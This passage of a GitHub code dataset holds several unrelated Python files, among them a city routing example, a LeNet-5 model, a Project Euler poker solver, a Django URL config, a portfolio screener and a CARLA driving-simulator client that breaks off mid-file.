graph edges to file\n # City.graph_edges_df.to_csv('data/test.csv')\n\n # Save Pickle file\n City.save_graph(name, data_folder)\n print('------------------------------------') \n\n # Load the CityNetwork\n City = CityNetwork.load_graph(name, data_folder)\n\n # City.plot(show=True)\n\n # CALCULATE NEAREST EDGES IF NOT AVAILABLE IN City.ne \n # City.ne = None\n dest_edges = City.nearest_edges(5, cpus=12)\n City.save_graph(name, data_folder)\n\n\n # REMOVE OUTLIERS FROM A CERTAIN DISTANCE\n City.drop_outliers(30)\n dest_edges = City.ne\n\n # Extract the new destinations skipping the outliers\n destinations = City.get_yx_destinations()\n\n # MULTICORE V2 STARTS HERE:\n # Compute shortest paths by hub for n clustering iterations\n # Hubs are randomly placed each iteration, just as example\n cluster_iterations = []\n num_hubs = 48\n num_iterations = 1\n\n for i in range(num_iterations):\n # Random seed, to compare results for different parameters\n random.seed(2)\n\n # Delft Center\n # Should be defined by k++ version of k-means in final algorithm\n # hubs = [(random.randint(6801030, 6803490), random.randint(484261, 486397)) for _ in range(num_hubs)]\n \n # Full Delft\n hubs = [(random.randint(6792760, 6805860), random.randint(478510, 490000)) for _ in range(num_hubs)]\n\n print(f\"Cluster iteration {i} started...\")\n start=time.time()\n\n # Calculate shortest paths by hub\n # Check the code for description of inputs.\n start = time.time()\n paths = unpack.multicore_single_source_shortest_path(City.graph, hubs, destinations, dest_edges,\n skip_non_shortest=False, \n skip_treshold=60,\n weight='travel_time', \n cutoff=None, \n cpus=12\n )\n end = time.time()\n print(end-start)\n\n colors = ['red', 'orange', 'yellow', 'pink', 'purple', 'peru']\n\n # Show the results\n paths_df = unpack.paths_to_dataframe(paths, colors, hubs=hubs)\n print(paths_df)\n\n '''\n\n CALCULATE FITNESS HERE\n REPOSITION THE HUBS BASED ON K-MEANS CLUSTERING \n \n '''\n\n # Add to cluster_iterations results\n cluster_iterations.append(paths)\n\n end=time.time()\n\n print(f\"Cluster iteration {i} finished in {end-start}s...\")\n \nif __name__ == 
'__main__':\n    main()","repo_name":"lm2-me/CORE","sub_path":"examples/example_multicore_v2.py","file_name":"example_multicore_v2.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"35749850992","text":"import keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\nimport numpy as np\r\n\r\nmodel = Sequential()\r\n\r\n# Convolution stage\r\nmodel.add(Conv2D(filters=6, kernel_size=5, strides=1, activation='relu', input_shape=(32, 32, 1)))\r\nmodel.add(MaxPooling2D(pool_size=2, strides=2))\r\nmodel.add(Conv2D(filters=16, kernel_size=5, strides=1, activation='relu', input_shape=(14, 14, 6)))\r\nmodel.add(MaxPooling2D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\n\r\n# Creating the neural network\r\nmodel.add(Dense(units=120, activation='relu'))\r\nmodel.add(Dense(units=84, activation='relu'))\r\nmodel.add(Dense(units=10, activation='softmax'))\r\n\r\n# Training stage (x_train and y_train are assumed to be loaded beforehand)\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.fit(x_train, y_train, steps_per_epoch=10, epochs=42)\r\n\r\n# Testing stage\r\ny_pred = model.predict(x_test)\r\n\r\n# Saving the predictions\r\nlabels = np.argmax(y_pred, axis=1)\r\nindex = np.arange(1, 28001)\r\nlabels = labels.reshape([len(labels), 1])\r\nindex = index.reshape([len(index), 1])\r\nfinal = np.concatenate([index, labels], axis=1)\r\nnp.savetxt(\"mnist_1.cvs\", final, delimiter=\" \", fmt='%s')\r\n","repo_name":"ArthurGM18/CNN","sub_path":"LeNet-5/leNet5.py","file_name":"leNet5.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} {"seq_id":"10615612723","text":"students = {}\nlesson = \"\"\n\nwhile True:\n    command = input()\n\n    if \":\" in command:\n        name, id, keys = command.split(\":\")\n        if keys not in students:\n            students[keys] = []\n        students[keys].append(f\"{name} - {id}\")\n    else:\n        if \"_\" in command:\n            lesson = command.replace(\"_\", \" \")\n            break\n        else:\n            lesson = command\n            break\n\nprint('\\n'.join(students[lesson]))","repo_name":"AlexanderBedrosyan/Programming-Fundamentals-with-Python","sub_path":"Dictionaries - Lab/students_1.py","file_name":"students_1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} {"seq_id":"5160992058","text":"while True:\r\n    user = int(input())\r\n    if user == 0:\r\n        break\r\n    matriz = []\r\n    v = 0\r\n    for c in range(user):\r\n        linha = []\r\n        for v in range(user):\r\n            linha.append(1)\r\n        matriz.append(linha)\r\n    val = 1\r\n    rig = user - 1\r\n    lef = 0\r\n    up = 0\r\n    down = user - 1\r\n    mid = user / 2 if user % 2 == 0 else (user + 1) / 2\r\n    while val <= mid:\r\n        for c in range(lef, rig + 1):\r\n            matriz[c][lef] = val\r\n            matriz[c][rig] = val\r\n        for c in range(up, down + 1):\r\n            matriz[up][c] = val\r\n            matriz[down][c] = val\r\n        val += 1\r\n        rig -= 1\r\n        lef += 1\r\n        up += 1\r\n        down -= 1\r\n    for c in range(user):\r\n        for v in range(user):\r\n            if v == user - 1:\r\n                print('{:3}'.format(matriz[c][v]))\r\n            else:\r\n                print('{:3}'.format(matriz[c][v]), end=' ')\r\n    print('')\r\n","repo_name":"Rkluk/uri","sub_path":"1435 Matriz Quadrada I FINAL eu acho.py","file_name":"1435 Matriz Quadrada I FINAL eu 
acho.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12634124167","text":"#################################\n# PROJECT EULER - PROBLEM 054 #\n#################################\nimport time\n\n\ndef get_card_values(hand: list[str]) -> tuple:\n \"\"\" Given a hand, return a tuple of the card values (2 <= value <= 14) in\n it, sorted in decreasing order. For example, for the hand 9D 6S QH 6H QC,\n the function returns (12, 12, 9, 9, 6). (Note that a Queen's value is 12).\n \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([VALUES[card] for card in cards])))\n\n\ndef get_weighted_card_values(hand: list[str]) -> tuple:\n \"\"\" To be able to compare two hands, we would like to sort the card values\n in a given hand in decreasing order by number of occurrences, and for two\n cards which occur the same number of times, the one with the highest value\n should appear first. Because this is not easy to implement, we instead sort\n in decreasing order by _weighted_ card values, where the weighted card\n value of a card is given by:\n value of the card + 15 * (# times it occurs - 1)\n In the end, this achieves the same result as intended originally. For\n example, for the hand 9D 6S QH 6H QC, the function returns\n (27, 27, 21, 21, 9) = (12 + 15, 12 + 15, 6 + 15, 6 + 15, 9).\n (Note that a Queen's value is 12). \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([VALUES[card] + 15 * (cards.count(card) - 1)\n for card in cards])))\n\n\ndef get_card_frequencies(hand: list[str]) -> tuple:\n \"\"\" Given a hand, returns the card frequencies as a tuple sorted in\n decreasing order. For example, for the hand 9D 6S QH 6H QC,\n the function returns (2, 2, 1). This function will be used to check if a\n hand has one pair, two pairs, etc... \"\"\"\n cards = []\n for string in hand:\n cards.append(string[0])\n return tuple(reversed(sorted([cards.count(card) for card in set(cards)])))\n\n\ndef are_all_of_the_same_suit(hand: list[str]) -> bool:\n \"\"\" Given a hand, decides if all cards in the hand are of the same suit.\n This will be used to check if we have a (straight, royal) flush.\"\"\"\n suits = set()\n for string in hand:\n suits.add(string[1])\n if len(suits) == 1:\n return True\n else:\n return False\n\n\ndef are_consecutive_values(hand: list[str]) -> bool:\n \"\"\" Given a hand, decides if its cards are of consecutive values. \"\"\"\n card_values = get_card_values(hand)\n for k in range(len(card_values) - 1):\n if card_values[k] != card_values[k + 1] + 1:\n return False\n return True\n\n\ndef get_hand_score(hand: list[str]) -> int:\n \"\"\" Given a hand, assigns a score between 1 and 10 to it, corresponding to\n the ten 'ranks' described in the problem statement. (A higher score is\n better than a lower score). 
\"\"\"\n card_frequencies = get_card_frequencies(hand)\n card_values = get_card_values(hand)\n score = 1\n\n if card_frequencies == (2, 1, 1, 1):\n score = 2\n if card_frequencies == (2, 2, 1):\n score = 3\n if card_frequencies == (3, 1, 1):\n score = 4\n if card_frequencies == (3, 2):\n score = 7\n if card_frequencies == (4, 1):\n score = 8\n if are_consecutive_values(hand) and score < 5:\n score = 5\n if are_all_of_the_same_suit(hand):\n if score < 6:\n score = 6\n if are_consecutive_values:\n score = 9\n if card_values == (14, 13, 12, 11, 10):\n score == 10\n return score\n\n\ndef tie_break(hand_1: list[str], hand_2: list[str]) -> int:\n \"\"\" If two hands have the same score, this function breaks the tie. \"\"\"\n if get_weighted_card_values(hand_1) > get_weighted_card_values(hand_2):\n return 1\n return 0\n\n\nstart = time.time()\n\nVALUES = {card: value for value, card in enumerate('23456789TJQKA', 2)}\n\n# Extract the hands of both players and store them in a list.\nhands_player_1: list[list[str]] = []\nhands_player_2: list[list[str]] = []\nwith open('p054_poker.txt') as file_object:\n for line in file_object:\n cards = line.rstrip().split(' ')\n hands_player_1.append(cards[:5])\n hands_player_2.append(cards[5:])\n\n\n# Calculate player 1's score.\ntotal_score_player_1 = 0\nfor (hand_1, hand_2) in zip(hands_player_1, hands_player_2):\n if get_hand_score(hand_1) > get_hand_score(hand_2):\n total_score_player_1 += 1\n elif get_hand_score(hand_1) == get_hand_score(hand_2):\n total_score_player_1 += tie_break(hand_1, hand_2)\n\nprint(total_score_player_1)\n\nend = time.time()\nprint(f\"Program runtime: {end - start} seconds\")\n","repo_name":"pzuehlke/Project-Euler-Solutions","sub_path":"problem_054.py","file_name":"problem_054.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42326276846","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\nx = np.arange(-10,10,0.001)\ny1 = 1./np.sqrt(1+np.abs(x))\ny2 = 1./(1+np.abs(x))\ny3 = 1./(1 + np.sqrt(np.abs(x)))\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\nax1.plot(x,y1,label=\"1/sqrt(1 + x)\")\nax1.plot(x,y2,label=\"1/(1 + x)\")\nax1.plot(x,y3,label=\"1/(1 + sqrt(x))\")\nax1.legend(loc=\"best\")\nplt.show()","repo_name":"juanmed/riseq_fast_uav","sub_path":"riseq_evaluation/libs/error_metrics/metrics_analysis.py","file_name":"metrics_analysis.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15843506756","text":"# -*- coding:utf-8 -*-\r\nfrom django.conf.urls import url\r\nfrom axf import views\r\n\r\nurlpatterns = [\r\n url(r'home/$', views.home),\r\n url(r'cart/$', views.cart),\r\n url(r'market/(\\w+)/(\\w+)/(\\w+)/$', views.market),\r\n url(r'mine/$', views.mine),\r\n url(r'detail/(\\w+)/(\\w+)/(\\w+)/$', views.detail),\r\n url(r'login/$', views.login),\r\n url(r'quit/$', views.quit),\r\n url(r'mine/address/$', views.address),\r\n url(r'address/addaddress/$', views.addAddress),\r\n url(r'^changecart/(\\d+)/$', views.changecart),\r\n url(r'^changecart2/$', views.changecart2),\r\n url(r'^order/$', views.order),\r\n\r\n]\r\n","repo_name":"Runbacktoo/python-ubuntu","sub_path":"project/axf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16130155763","text":"import pandas as pd\nfrom bs4 
import BeautifulSoup\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport math\nfrom winreg import *\n\n\n\n\n\nwith OpenKey(HKEY_CURRENT_USER, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders') as key:\n Downloads = QueryValueEx(key, '{374DE290-123F-4565-9164-39C4925E467B}')[0]\n\nif os.path.exists(Downloads+\"\\constituents_csv.csv\"):\n os.remove(Downloads+\"\\constituents_csv.csv\")\nelse:\n print(\"The file does not exist\")\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get(\"https://datahub.io/core/s-and-p-500-companies#resource-constituents\")\n\nelement = driver.find_element_by_link_text(\"csv (19kB)\")\nelement.click();\n\nDownload= Downloads + '\\constituents_csv.csv'\n\n\n\n\n\nSPdata=pd.pandas.read_csv(Download)\n\n\n\n\n\nimport yfinance as yf\nprint('Completed :')\nfor x in range(504):\n ticker = SPdata[\"Symbol\"].iloc[x]\n \n if \".\" in ticker:\n print(ticker + \" not counted\")\n else:\n def yfinancetut(tickersymbol):\n tickerdata = yf.Ticker(tickersymbol)\n tickerinfo = tickerdata.info\n hist = tickerdata.history(period=\"1Y\")\n\n\n beta_info = tickerinfo['beta']\n \n if 'priceToBook' in tickerinfo:\n pricetobook_info= tickerinfo['priceToBook']\n SPdata.loc[SPdata.index[x], 'Price to Book'] = pricetobook_info\n else:\n SPdata.loc[SPdata.index[x], 'Price to Book'] = np.nan\n\n \n mean_info = hist['Close'].mean()\n standdev_info = hist['Close'].std(axis = 0, skipna = True)\n lastclose_info = hist['Close'].iloc[-1]\n zscore_info = ((lastclose_info - mean_info)/standdev_info)\n\n\n SPdata.loc[SPdata.index[x], 'Beta'] = beta_info\n \n SPdata.loc[SPdata.index[x], 'Z-Score'] = zscore_info\n print (x)\n yfinancetut(ticker)\n\n\n\n\nSPdata.to_csv ('updated_values.csv', index = False, header=True)\n\n\n\n\n\nUPdata=pd.pandas.read_csv('updated_values.csv')\n\n\n\n\n\nfor x in range(504):\n if -1 < UPdata[\"Beta\"].iloc[x] < 2.8:\n UPdata.loc[UPdata.index[x], 'refined_beta'] = UPdata[\"Beta\"].iloc[x]\n else:\n UPdata.loc[UPdata.index[x], 'refined_beta'] = np.nan\n\n\n\n\n\nfor x in range(504):\n UPdata.loc[UPdata.index[x], 'log_pb'] = math.log(UPdata[\"Price to Book\"].iloc[x], 10)\n \n if -1 < UPdata[\"log_pb\"].iloc[x] < 1.5:\n UPdata.loc[UPdata.index[x], 'refined_pb'] = UPdata[\"log_pb\"].iloc[x]\n else:\n UPdata.loc[UPdata.index[x], 'refined_pb'] = np.nan\n\n\n\n\n\nUPdata = UPdata.dropna(subset=['Beta', 'Price to Book', 'Z-Score'])\n\n\n\n\n\nstd_refbeta = UPdata['refined_beta'].std()\nmean_refbeta = UPdata['refined_beta'].mean()\nstd_refpb = UPdata['refined_pb'].std()\nmean_refpb = UPdata['refined_pb'].mean()\n\n\n\n\nfor x in range(len(UPdata.index)):\n UPdata.loc[UPdata.index[x], 'z-score_beta'] = (UPdata[\"Beta\"].iloc[x] - mean_refbeta)/std_refbeta\n UPdata.loc[UPdata.index[x], 'z-score_pb'] = (math.log(UPdata[\"Price to Book\"].iloc[x], 10) - mean_refpb)/std_refpb\n\n\n\n\n\nfor x in range(len(UPdata.index)):\n UPdata.loc[UPdata.index[x], 'sum z-score'] = (UPdata[\"z-score_beta\"].iloc[x] + UPdata[\"z-score_pb\"].iloc[x] +UPdata[\"Z-Score\"].iloc[x])\n\n\n\n\n\nUPdata.sort_values(by=['sum z-score'], inplace=True)\n\n\n\n\n\nsum_topten = 0\nfor x in range(9):\n sum_topten = UPdata[\"sum z-score\"].iloc[x] + sum_topten\n UPdata.loc[UPdata.index[x], 'position'] = \"Long\"\nweightage_eachtop = 0.5/sum_topten\n\n\n\n\n\nsum_bottomten = 0\nfor x in 
range(1,10):\n    xmodi = x * (-1)\n    sum_bottomten = UPdata[\"sum z-score\"].iloc[xmodi] + sum_bottomten\n    UPdata.loc[UPdata.index[xmodi], 'position'] = \"Short\"\n    \nweightage_eachbottom = 0.5/sum_bottomten\n\n\n\n\n\nfor x in range(9):\n    UPdata.loc[UPdata.index[x], 'weightage %'] = UPdata[\"sum z-score\"].iloc[x] * weightage_eachtop\n    UPdata.loc[UPdata.index[x], 'avg z-score'] = (UPdata['sum z-score'].iloc[x])/3\n\n\n\n\n\nfor x in range(1,10):\n    xmodi = x * (-1) \n    UPdata.loc[UPdata.index[xmodi], 'weightage %'] = UPdata[\"sum z-score\"].iloc[xmodi] * weightage_eachbottom\n    UPdata.loc[UPdata.index[xmodi], 'avg z-score'] = (UPdata['sum z-score'].iloc[xmodi])/3\n\n\n\n\n\nUPdata = UPdata.dropna(subset=['weightage %'])\n\n\n\n\n\nUPdata = UPdata.drop(['Beta', 'Price to Book', 'Z-Score','refined_beta', 'refined_pb', 'log_pb','z-score_beta', 'z-score_pb', 'sum z-score'], axis=1)\n\n\n\n\ndef color_negative_red(value):\n    if value == 'Short':\n        color = 'red'\n\n    else:\n        color = 'green'\n    \n    \n    return 'color: %s' % color\n\n(UPdata.style\n    .applymap(color_negative_red, subset=['position'])\n    .format({'weightage %': \"{:.2%}\"}))\n\n\n\n\nUPdata.to_csv('dollar nuetral portfolio.csv', index=False, header=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rontik2002/Dollar_Neutral_Portfolio","sub_path":"Dollar Neutral Portfolio.py","file_name":"Dollar Neutral Portfolio.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} {"seq_id":"21414765751","text":"import pickle\r\nimport subprocess\r\nimport os\r\n\r\n# out_dir = \"/afs/inf.ed.ac.uk/group/msc-projects/s2096077/vm_eng_wavs\"\r\n# lang = \"eng\"\r\n\r\nout_dir = \"/afs/inf.ed.ac.uk/group/msc-projects/s2096077/vm_ger_wavs\"\r\nlang = \"ger\"\r\n\r\nwith open('sentence_id2recording_{}_new.pickle'.format(lang), 'rb') as handle:\r\n    sentence_id2recording = pickle.load(handle)\r\n\r\nfor sentence_id, path_to_wav_file in list(sentence_id2recording.items()):\r\n    subprocess.run('''\r\n    # This will take a lot of disk space (6GB for 25000 sph files)\r\n    cp {} {}'''.format(path_to_wav_file, os.path.join(out_dir, sentence_id + \".wav\")),\r\n                   shell=True, check=True,\r\n                   executable='/bin/bash')\r\n","repo_name":"machnicole/prosody_nlp","sub_path":"code/feature_extraction/create_wav_dir.py","file_name":"create_wav_dir.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} {"seq_id":"24002456906","text":"from collections import Counter\nimport numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n\ndef plot_viterbi_path_binary(\n    viterbi: np.array, backpointer: list, sentence: str, tags: str\n) -> None:\n    \"\"\"\n    Shows the viterbi matrix result, highlighting the values that obtained the maximum probability at a given\n    time step.\n\n    Parameters\n    ----------\n    viterbi: viterbi algorithm matrix result. First element obtained after calling function: viterbi_logprobs\n    backpointer: viterbi algorithm backpointer result. 
Second element obtained after calling function: viterbi_logprobs\n    sentence: sentence which we have computed the probabilities against\n    tags: set of tags used in the algorithm\n\n    \"\"\"\n    colors = viterbi.copy()\n\n    for i in range(len(backpointer)):\n        argmax_row = backpointer[i]\n        colors[argmax_row, i] += 10000\n\n    fig = go.Figure(\n        data=go.Heatmap(\n            z=colors,\n            x=[word for word in sentence.split(\" \")],\n            y=[tag for tag in tags],\n            colorscale=\"Thermal\",\n            text=viterbi,\n            texttemplate=\"%{text}\",\n            textfont={\"size\": 20},\n            showscale=False,\n        )\n    )\n    fig.show(legend=False)\n\n\ndef plot_viterbi_matrix(viterbi: np.array, sentence: str, tags: str) -> None:\n    \"\"\"\n    Shows the viterbi matrix result, painting the probabilities overall\n\n    Parameters\n    ----------\n    viterbi: viterbi algorithm matrix result. First element obtained after calling function: viterbi_logprobs\n    sentence: sentence which we have computed the probabilities against\n    tags: set of tags used in the algorithm\n\n    \"\"\"\n    fig = go.Figure(\n        data=go.Heatmap(\n            z=viterbi,\n            x=[word for word in sentence.split(\" \")],\n            y=[tag for tag in tags],\n            colorscale=\"Thermal\",\n        )\n    )\n    fig.show(legend=False)\n\n\ndef plot_frequency_of_(\n    feature: str, feature_counts_train: Counter, feature_counts_test: Counter, top=50\n):\n    most_common_counts_train = feature_counts_train.most_common(top)\n    x_train = [word for word, _ in most_common_counts_train]\n    y_train = [count for _, count in most_common_counts_train]\n\n    most_common_counts_test = feature_counts_test.most_common(top)\n    x_test = [word for word, _ in most_common_counts_test]\n    y_test = [count for _, count in most_common_counts_test]\n\n    fig = make_subplots(rows=1, cols=2, subplot_titles=[\"Train data\", \"Test data\"])\n    fig.add_trace(go.Bar(x=x_train, y=y_train), row=1, col=1)\n    fig.add_trace(go.Bar(x=x_test, y=y_test), row=1, col=2)\n\n    fig.update_xaxes(title_text=f\"{feature.title()}\", row=1, col=1)\n    fig.update_yaxes(title_text=\"Occurrences\", row=1, col=1)\n    fig.update_xaxes(title_text=f\"{feature.title()}\", row=1, col=2)\n    fig.update_yaxes(title_text=\"Occurrences\", row=1, col=2)\n\n    fig.update_layout(showlegend=False)\n    fig.show()\n\n\ndef compare_size_and_time(datasets: dict, timings: list[int], title: str = \"\"):\n    fig = make_subplots(rows=1, cols=2)\n    fig.add_trace(\n        go.Scatter(\n            x=[key for key in datasets.keys()],\n            y=[len(value) for value in datasets.values()],\n            name=\"Size\",\n        ),\n        row=1,\n        col=1,\n    )\n    fig.add_trace(\n        go.Scatter(x=[key for key in datasets.keys()], y=timings, name=\"Time\"),\n        row=1,\n        col=2,\n    )\n\n    fig.update_xaxes(title_text=f\"Dataset Name\", row=1, col=1)\n    fig.update_yaxes(title_text=\"Number of rows\", row=1, col=1)\n\n    fig.update_xaxes(title_text=f\"Dataset Name\", row=1, col=2)\n    fig.update_yaxes(title_text=\"Avg Time of Execution (s)\", row=1, col=2)\n\n    if title:\n        fig.update_layout(title_text=title)\n\n    fig.show()\n","repo_name":"ramcarreno/pos-tagger","sub_path":"src/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} {"seq_id":"43503595767","text":"from __future__ import print_function\n\nimport argparse\nimport collections\nimport datetime\nimport glob\nimport logging\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport weakref\nfrom collections import deque\nimport numpy as np\nimport xlwt\nimport time\ntry:\n    import pygame\n    from pygame.locals import KMOD_CTRL\n    from 
pygame.locals import KMOD_SHIFT\n from pygame.locals import K_0\n from pygame.locals import K_9\n from pygame.locals import K_BACKQUOTE\n from pygame.locals import K_BACKSPACE\n from pygame.locals import K_COMMA\n from pygame.locals import K_DOWN\n from pygame.locals import K_ESCAPE\n from pygame.locals import K_F1\n from pygame.locals import K_LEFT\n from pygame.locals import K_PERIOD\n from pygame.locals import K_RIGHT\n from pygame.locals import K_SLASH\n from pygame.locals import K_SPACE\n from pygame.locals import K_TAB\n from pygame.locals import K_UP\n from pygame.locals import K_a\n from pygame.locals import K_c\n from pygame.locals import K_d\n from pygame.locals import K_h\n from pygame.locals import K_m\n from pygame.locals import K_p\n from pygame.locals import K_q\n from pygame.locals import K_r\n from pygame.locals import K_s\n from pygame.locals import K_w\nexcept ImportError:\n raise RuntimeError('cannot import pygame, make sure pygame package is installed')\n\ntry:\n import numpy as np\nexcept ImportError:\n raise RuntimeError(\n 'cannot import numpy, make sure numpy package is installed')\n\n# ==============================================================================\n# -- find carla module ---------------------------------------------------------\n# ==============================================================================\ntry:\n sys.path.append(glob.glob('**/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\n\nimport carla\nfrom carla import ColorConverter as cc\nfrom agents.navigation.roaming_agent import *\nfrom agents.navigation.basic_agent import *\nfrom agents.tools.misc import distance_vehicle, get_speed\nfrom agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle\n\n\n\n# ==============================================================================\n# -- Global functions ----------------------------------------------------------\n# ==============================================================================\ndef find_weather_presets():\n rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')\n name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))\n presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]\n return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]\n\n\ndef get_actor_display_name(actor, truncate=250):\n name = ' '.join(actor.type_id.replace('_', '.').title().split('.')[1:])\n return (name[:truncate-1] + u'\\u2026') if len(name) > truncate else name\n\n\n# ==============================================================================\n# -- World ---------------------------------------------------------------\n# ==============================================================================\n\nclass World(object):\n def __init__(self, carla_world, hud):\n self.world = carla_world\n self.hud = hud\n self.vehicle = None\n self.collision_sensor = None\n self.lane_invasion_sensor = None\n self.camera_manager = None\n self._weather_presets = find_weather_presets()\n self._weather_index = 0\n self.restart()\n self.world.on_tick(hud.on_world_tick)\n\n def restart(self):\n # Keep same camera config if the camera manager exists.\n cam_index = self.camera_manager._index if self.camera_manager is not None else 0\n cam_pos_index = self.camera_manager._transform_index if self.camera_manager is not None else 0\n\n blueprint = 
random.choice(self.world.get_blueprint_library().filter('vehicle.tesla.*'))\n # blueprint = random.choice(self.world.get_blueprint_library().filter('vehicle.ford.mustang'))\n # blueprint = random.choice(self.world.get_blueprint_library().filter('vehicle.bmw.grandtourer')) \n blueprint.set_attribute('role_name', 'hero')\n blueprint.set_attribute('color', '120,0,0')\n \n # if blueprint.has_attribute('color'):\n # color = random.choice(blueprint.get_attribute('color').recommended_values)\n # blueprint.set_attribute('color', color)\n\n # Spawn the vehicle.\n if self.vehicle is not None:\n spawn_point = self.vehicle.get_transform()\n spawn_point.location.z += 2.0\n spawn_point.rotation.roll = 0.0\n spawn_point.rotation.pitch = 0.0\n self.destroy()\n\n spawn_points = self.world.get_map().get_spawn_points()\n spawn_point = spawn_points[1]\n self.vehicle = self.world.spawn_actor(blueprint, spawn_point)\n\n while self.vehicle is None:\n # spawn_points = self.world.get_map().get_spawn_points()\n # spawn_point = spawn_points[1]\n # self.vehicle = self.world.spawn_actor(blueprint, spawn_point)\n \n # support_actor = random.choice(self.world.get_actors().filter(\"*vehicle*\"))\n # support_actor_point = support_actor.get_transform()\n # spawn_point = support_actor_point\n # spawn_point.location.y = spawn_point.location.y - 10.0\n # spawn_point = carla.Transform(carla.Location(x=373.40, y=-8.7, z=0.40), carla.Rotation(pitch=0, yaw=-181.00004, roll=0))\n # Tesla spawn parameter\n spawn_point = carla.Transform(carla.Location(x=-2.10 ,y=-150, z=0.80), carla.Rotation(pitch=0, yaw=90.0, roll=0))\n\n\n # spawn_point.rotation.roll = 90.0\n # spawn_point.rotation.pitch = 90.0\n \n # spawn_point = carla.Transform (carla.Location(x=232,y=160,z=2),carla.Rotation(roll=0,pitch=0,yaw=180))\n self.vehicle = self.world.try_spawn_actor(blueprint, spawn_point)\n \n # Set up the sensors.\n self.collision_sensor = CollisionSensor(self.vehicle, self.hud)\n self.lane_invasion_sensor = LaneInvasionSensor(self.vehicle, self.hud)\n self.camera_manager = CameraManager(self.vehicle, self.hud)\n self.camera_manager._transform_index = cam_pos_index\n self.camera_manager.set_sensor(cam_index, notify=False)\n actor_type = get_actor_display_name(self.vehicle)\n self.hud.notification(actor_type)\n \n # def record(self,vehicle):\n # global counter\n # name = str(get_actor_display_name(vehicle, truncate=20))\n # velocity = vehicle.get_velocity()\n # speed = 3.6 * math.sqrt(velocity.x**2 + velocity.y**2 + velocity.z**2)\n # wb = xlwt.Workbook()\n # sheet1 = wb.add_sheet(name)\n # row = counter\n # sheet1.write(row,0,'jajaja')\n # wb.save('record_2.xlsx')\n\n\n def next_weather(self, reverse=False):\n self._weather_index += -1 if reverse else 1\n self._weather_index %= len(self._weather_presets)\n preset = self._weather_presets[self._weather_index]\n self.hud.notification('Weather: %s' % preset[1])\n self.vehicle.get_world().set_weather(preset[0])\n\n def tick(self, clock):\n self.hud.tick(self, clock)\n\n def render(self, display):\n self.camera_manager.render(display)\n self.hud.render(display)\n\n def destroy(self):\n actors = [\n self.camera_manager.sensor,\n self.collision_sensor.sensor,\n self.lane_invasion_sensor.sensor,\n self.vehicle]\n for actor in actors:\n if actor is not None:\n actor.destroy()\n\n\n# ==============================================================================\n# -- KeyboardControl -----------------------------------------------------------\n# 
==============================================================================\n\nclass KeyboardControl(object):\n def __init__(self, world, start_in_autopilot):\n self._autopilot_enabled = start_in_autopilot\n self._control = carla.VehicleControl()\n self._steer_cache = 0.0\n world.vehicle.set_autopilot(self._autopilot_enabled)\n world.hud.notification(\"Press 'H' or '?' for help.\", seconds=4.0)\n\n def parse_events(self, world, clock):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n elif event.type == pygame.KEYUP:\n if self._is_quit_shortcut(event.key):\n return True\n elif event.key == K_BACKSPACE:\n world.restart()\n elif event.key == K_F1:\n world.hud.toggle_info()\n elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):\n world.hud.help.toggle()\n elif event.key == K_TAB:\n world.camera_manager.toggle_camera()\n elif event.key == K_c and pygame.key.get_mods() & KMOD_SHIFT:\n world.next_weather(reverse=True)\n elif event.key == K_c:\n world.next_weather()\n elif event.key == K_BACKQUOTE:\n world.camera_manager.next_sensor()\n elif event.key > K_0 and event.key <= K_9:\n world.camera_manager.set_sensor(event.key - 